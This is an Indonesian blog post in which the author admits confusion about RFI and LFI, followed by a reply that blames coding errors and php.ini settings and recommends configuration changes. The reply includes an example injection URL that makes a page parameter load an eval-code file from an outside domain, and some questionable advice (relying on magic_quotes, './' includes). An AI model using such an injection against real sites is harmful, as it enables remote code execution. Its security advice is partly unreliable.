Beranda > Documents > RFI dan LFI

RFI dan LFI

apakah itu RFI atau LFI..??

di ambil dari sebuah pertanyaanku pada someone tentang “Penyebab Terjadinya RFI dan atau LFI”..

dan ternyata Pertanyaanku menjadi BOMMERANG yang akhirnya aku masih belum paham juga tentang RFI dan LFI, sungguh diriku ini NATO dan sangat-sangat menyedihkan.😦 ..

tapi itu semua aku anggap sebagai pelajaran untuk kedepannya..!!

aku merasa tidak pernah ingin menjadi seorang ***** tapi aku cuma ingin mengerti tehnik dan securitynya saja.. mungkin beberapa orang menganggap aku ini orang yang serba bisa,, tpi itu semua hanya Topengku saja dan tidak pernah ada dan melekat pada diriku tentang apa pendapat orang..

aku adalahaku, dan dia adalah dia,

yang paling berkesan dalam menggauli DUNIA MAYA ini bagiku adalah sebuah kepuasan tersendiri, tapi bahkan kepuasan itu aku masih belummemahaminya, aku hanya bisa Melihat, Mendengar, dan Mencoba tanpa tahu yang kulakukanitu apa.!!!!
##############################################

wakakakak ente lasingan berembe meton? inject kiri kanan ga tau apa penyebabnya bisa begitu? entar dah ane coba posting kenape tu bug bisa terjadi😀 terus belajar brother . . .

ente lok nanya ma tu orang berdua ente harus ada dasar pertanyaan . . . lok tak baca ente nanya RFI dan LFI ? nah koe dah tau ciri2 bug tersebut . . . karena kesalahan coding dan kesalahan configurasi server yaitu file php.ini coba koe buka xampp ente cari file namanyaphp.ini nah disana kita bisa setting biar ga bisa RFI ato LFI .

setting seperti ini

allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on

penjelasan :

allow_url_include = off –> jika on maka bisa di inject dari server luar contoh
http://localhost/index.php?page=article.php
injectnya = http://localhost/index.php?page=http://domain.com/evalcode.txt
seperti yang biasa koe lakuin

allow_url_fopen = off = tidak mengijinkan membuka url luar
magic_quotes_gpc = on jika off maka character tidak akan di filter

coba koe pelajari php include . . .
jika

<php
include 'data.php';
?>

tu bisa di inject

tapi jika
<php
include './data.php';
?>

server akan mencari file di server itu sendiri catatan  “./” folder tempat file yang di includkan

segitu aja deh dlu om . . .sorry jangan tersinggung . lok tersinggung ga jadi koe bisa

koreksi diri sendiri sebelum koreksi orang lain😀 halah bahasanya😀 kaboooooorrrrrr

Kategori:Documents
  1. Belum ada komentar.
  1. No trackbacks yet.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: